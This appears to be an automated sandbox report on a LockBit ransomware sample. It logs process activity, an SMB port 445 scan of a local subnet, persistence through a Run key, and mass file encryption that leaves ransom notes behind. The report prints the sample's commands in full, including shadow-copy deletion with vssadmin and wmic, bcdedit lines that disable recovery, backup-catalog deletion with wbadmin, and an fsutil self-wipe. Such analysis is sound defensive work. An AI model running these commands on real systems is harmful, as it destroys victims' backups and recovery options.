PID 2956 wrote to memory of 1412 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2956 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2424 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 2876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2956 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2956 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2956 wrote to memory of 1888 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 2856 wrote to memory of 776 N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe C:\Windows\SysWOW64\cmd.exe
PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 776 wrote to memory of 2840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe
PID 776 wrote to memory of 476 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\fsutil.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.7 -n 3

C:\Windows\SysWOW64\fsutil.exe

fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

Network

Country Destination Domain Proto
N/A 10.127.1.216:445 tcp
N/A 10.127.1.254:445 tcp
N/A 10.127.1.226:445 tcp
N/A 10.127.1.197:445 tcp
N/A 10.127.1.244:445 tcp
N/A 10.127.1.253:445 tcp
N/A 10.127.1.198:445 tcp
N/A 10.127.1.224:445 tcp
N/A 10.127.1.205:445 tcp
N/A 10.127.1.219:445 tcp
N/A 10.127.1.203:445 tcp
N/A 10.127.1.230:445 tcp
N/A 10.127.1.223:445 tcp
N/A 10.127.1.207:445 tcp
N/A 10.127.1.220:445 tcp
N/A 10.127.1.251:445 tcp
N/A 10.127.1.241:445 tcp
N/A 10.127.1.225:445 tcp
N/A 10.127.1.193:445 tcp
N/A 10.127.1.242:445 tcp
N/A 10.127.1.190:445 tcp
N/A 10.127.1.215:445 tcp
N/A 10.127.1.200:445 tcp
N/A 10.127.1.194:445 tcp
N/A 10.127.1.192:445 tcp
N/A 10.127.1.235:445 tcp
N/A 10.127.1.234:445 tcp
N/A 10.127.1.218:445 tcp
N/A 10.127.1.210:445 tcp
N/A 10.127.1.240:445 tcp
N/A 10.127.1.222:445 tcp
N/A 10.127.1.221:445 tcp
N/A 10.127.1.233:445 tcp
N/A 10.127.1.211:445 tcp
N/A 10.127.1.208:445 tcp
N/A 10.127.1.248:445 tcp
N/A 10.127.1.247:445 tcp
N/A 10.127.1.231:445 tcp
N/A 10.127.1.246:445 tcp
N/A 10.127.1.237:445 tcp
N/A 10.127.1.249:445 tcp
N/A 10.127.1.227:445 tcp
N/A 10.127.1.252:445 tcp
N/A 10.127.1.239:445 tcp
N/A 10.127.1.214:445 tcp
N/A 10.127.1.250:445 tcp
N/A 10.127.1.245:445 tcp
N/A 10.127.1.243:445 tcp
N/A 10.127.1.238:445 tcp
N/A 10.127.1.236:445 tcp
N/A 10.127.1.232:445 tcp
N/A 10.127.1.229:445 tcp
N/A 10.127.1.228:445 tcp
N/A 10.127.1.217:445 tcp
N/A 10.127.1.213:445 tcp
N/A 10.127.1.212:445 tcp
N/A 10.127.1.209:445 tcp
N/A 10.127.1.206:445 tcp
N/A 10.127.1.204:445 tcp
N/A 10.127.1.202:445 tcp
N/A 10.127.1.201:445 tcp
N/A 10.127.1.199:445 tcp
N/A 10.127.1.196:445 tcp
N/A 10.127.1.195:445 tcp
N/A 10.127.1.191:445 tcp
N/A 10.127.1.189:445 tcp
N/A 10.127.1.188:445 tcp
N/A 10.127.1.187:445 tcp
N/A 10.127.1.186:445 tcp
N/A 10.127.1.185:445 tcp
N/A 10.127.1.184:445 tcp
N/A 10.127.1.183:445 tcp
N/A 10.127.1.182:445 tcp
N/A 10.127.1.181:445 tcp
N/A 10.127.1.180:445 tcp
N/A 10.127.1.179:445 tcp
N/A 10.127.1.178:445 tcp
N/A 10.127.1.177:445 tcp
N/A 10.127.1.176:445 tcp
N/A 10.127.1.175:445 tcp
N/A 10.127.1.174:445 tcp
N/A 10.127.1.173:445 tcp
N/A 10.127.1.172:445 tcp
N/A 10.127.1.171:445 tcp
N/A 10.127.1.170:445 tcp
N/A 10.127.1.169:445 tcp
N/A 10.127.1.168:445 tcp
N/A 10.127.1.167:445 tcp
N/A 10.127.1.166:445 tcp
N/A 10.127.1.165:445 tcp
N/A 10.127.1.164:445 tcp
N/A 10.127.1.163:445 tcp
N/A 10.127.1.162:445 tcp
N/A 10.127.1.161:445 tcp
N/A 10.127.1.160:445 tcp
N/A 10.127.1.159:445 tcp
N/A 10.127.1.158:445 tcp
N/A 10.127.1.157:445 tcp
N/A 10.127.1.156:445 tcp
N/A 10.127.1.155:445 tcp
N/A 10.127.1.154:445 tcp
N/A 10.127.1.153:445 tcp
N/A 10.127.1.152:445 tcp
N/A 10.127.1.151:445 tcp
N/A 10.127.1.150:445 tcp
N/A 10.127.1.149:445 tcp
N/A 10.127.1.148:445 tcp
N/A 10.127.1.147:445 tcp
N/A 10.127.1.146:445 tcp
N/A 10.127.1.145:445 tcp
N/A 10.127.1.144:445 tcp
N/A 10.127.1.143:445 tcp
N/A 10.127.1.142:445 tcp
N/A 10.127.1.141:445 tcp
N/A 10.127.1.140:445 tcp
N/A 10.127.1.139:445 tcp
N/A 10.127.1.138:445 tcp
N/A 10.127.1.137:445 tcp
N/A 10.127.1.136:445 tcp
N/A 10.127.1.135:445 tcp
N/A 10.127.1.134:445 tcp
N/A 10.127.1.133:445 tcp
N/A 10.127.1.132:445 tcp
N/A 10.127.1.131:445 tcp
N/A 10.127.1.130:445 tcp
N/A 10.127.1.129:445 tcp
N/A 10.127.1.128:445 tcp
N/A 10.127.1.127:445 tcp
N/A 10.127.1.126:445 tcp
N/A 10.127.1.125:445 tcp
N/A 10.127.1.124:445 tcp
N/A 10.127.1.123:445 tcp
N/A 10.127.1.122:445 tcp
N/A 10.127.1.121:445 tcp
N/A 10.127.1.120:445 tcp
N/A 10.127.1.119:445 tcp
N/A 10.127.1.118:445 tcp
N/A 10.127.1.117:445 tcp
N/A 10.127.1.116:445 tcp
N/A 10.127.1.115:445 tcp
N/A 10.127.1.114:445 tcp
N/A 10.127.1.113:445 tcp
N/A 10.127.1.112:445 tcp
N/A 10.127.1.111:445 tcp
N/A 10.127.1.110:445 tcp
N/A 10.127.1.109:445 tcp
N/A 10.127.1.108:445 tcp
N/A 10.127.1.107:445 tcp
N/A 10.127.1.106:445 tcp
N/A 10.127.1.105:445 tcp
N/A 10.127.1.104:445 tcp
N/A 10.127.1.103:445 tcp
N/A 10.127.1.102:445 tcp
N/A 10.127.1.101:445 tcp
N/A 10.127.1.100:445 tcp
N/A 10.127.1.99:445 tcp
N/A 10.127.1.98:445 tcp
N/A 10.127.1.97:445 tcp
N/A 10.127.1.96:445 tcp
N/A 10.127.1.95:445 tcp
N/A 10.127.1.94:445 tcp
N/A 10.127.1.93:445 tcp
N/A 10.127.1.92:445 tcp
N/A 10.127.1.91:445 tcp
N/A 10.127.1.90:445 tcp
N/A 10.127.1.89:445 tcp
N/A 10.127.1.88:445 tcp
N/A 10.127.1.86:445 tcp
N/A 10.127.1.87:445 tcp
N/A 10.127.1.85:445 tcp
N/A 10.127.1.84:445 tcp
N/A 10.127.1.83:445 tcp
N/A 10.127.1.81:445 tcp
N/A 10.127.1.82:445 tcp
N/A 10.127.1.79:445 tcp
N/A 10.127.1.80:445 tcp
N/A 10.127.1.78:445 tcp
N/A 10.127.1.76:445 tcp
N/A 10.127.1.77:445 tcp
N/A 10.127.1.74:445 tcp
N/A 10.127.1.75:445 tcp
N/A 10.127.1.73:445 tcp
N/A 10.127.1.72:445 tcp
N/A 10.127.1.71:445 tcp
N/A 10.127.1.70:445 tcp
N/A 10.127.1.69:445 tcp
N/A 10.127.1.67:445 tcp
N/A 10.127.1.68:445 tcp
N/A 10.127.1.65:445 tcp
N/A 10.127.1.66:445 tcp
N/A 10.127.1.63:445 tcp
N/A 10.127.1.64:445 tcp
N/A 10.127.1.62:445 tcp
N/A 10.127.1.61:445 tcp
N/A 10.127.1.59:445 tcp
N/A 10.127.1.60:445 tcp
N/A 10.127.1.58:445 tcp
N/A 10.127.1.57:445 tcp
N/A 10.127.1.56:445 tcp
N/A 10.127.1.55:445 tcp
N/A 10.127.1.54:445 tcp
N/A 10.127.1.52:445 tcp
N/A 10.127.1.53:445 tcp
N/A 10.127.1.49:445 tcp
N/A 10.127.1.51:445 tcp
N/A 10.127.1.48:445 tcp
N/A 10.127.1.46:445 tcp
N/A 10.127.1.47:445 tcp
N/A 10.127.1.44:445 tcp
N/A 10.127.1.45:445 tcp
N/A 10.127.1.43:445 tcp
N/A 10.127.1.42:445 tcp
N/A 10.127.1.41:445 tcp
N/A 10.127.1.40:445 tcp
N/A 10.127.1.39:445 tcp
N/A 10.127.1.38:445 tcp
N/A 10.127.1.37:445 tcp
N/A 10.127.1.36:445 tcp
N/A 10.127.1.35:445 tcp
N/A 10.127.1.33:445 tcp
N/A 10.127.1.34:445 tcp
N/A 10.127.1.32:445 tcp
N/A 10.127.1.30:445 tcp
N/A 10.127.1.31:445 tcp
N/A 10.127.1.29:445 tcp
N/A 10.127.1.28:445 tcp
N/A 10.127.1.27:445 tcp
N/A 10.127.1.26:445 tcp
N/A 10.127.1.25:445 tcp
N/A 10.127.1.23:445 tcp
N/A 10.127.1.24:445 tcp
N/A 10.127.1.22:445 tcp
N/A 10.127.1.20:445 tcp
N/A 10.127.1.21:445 tcp
N/A 10.127.1.18:445 tcp
N/A 10.127.1.19:445 tcp
N/A 10.127.1.17:445 tcp
N/A 10.127.1.16:445 tcp
N/A 10.127.1.15:445 tcp
N/A 10.127.1.14:445 tcp
N/A 10.127.1.13:445 tcp
N/A 10.127.1.12:445 tcp
N/A 10.127.1.11:445 tcp
N/A 10.127.1.10:445 tcp
N/A 10.127.1.9:445 tcp
N/A 10.127.1.8:445 tcp
N/A 10.127.1.7:445 tcp
N/A 10.127.1.6:445 tcp
N/A 10.127.1.5:445 tcp
N/A 10.127.1.4:445 tcp
N/A 10.127.1.3:445 tcp
N/A 10.127.1.2:445 tcp
N/A 10.127.1.1:445 tcp
N/A 10.127.1.0:445 tcp

Files

C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt

MD5 18f0a8ba3fee94cc312f972e3dd92516
SHA1 16994dd14059bfd6a890ac0c6a3a0b67aa33ce45
SHA256 27a63df2e83b00c8a9d40dbe648ad4d8a47f26a8ea4270356ff83f5247b9141f
SHA512 854a9c31ef5cad85435100221455b8f712f78b80cb41c2e84d332ab84824aa6bc6df92464ef433f773b24c563143c248bbe69c7f568c9fe7e3836929ee281ca6

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-29 08:02

Reported

2024-02-29 08:05

Platform

win10v2004-20240226-en

Max time kernel

93s

Max time network

114s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (14166) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\file.None.0xfffffa801c116990.mal.exe\"" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1FF7.tmp.bmp" C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\it-IT\MSFT_PackageManagement.strings.psd1.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\uk-UA\setup_wm.exe.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\illustrations.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\giflib.md.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\ja-JP\mpvis.dll.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxSelected.svg.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\office32ww.msi.16.x-none.vreg.dat.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-2x.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri.xml.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.LEX.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\it-it\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Sort\TAG.XSL.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetCompare_f_col.hxk.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Media Player\ja-JP\wmpnssci.dll.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Configuration\card_terms_dict.txt.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.tree.dat.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon.png.lockbit C:\Users\Admin\AppData\Local\Temp\file.None.0xfffffa801c116990.mal.exe N/A
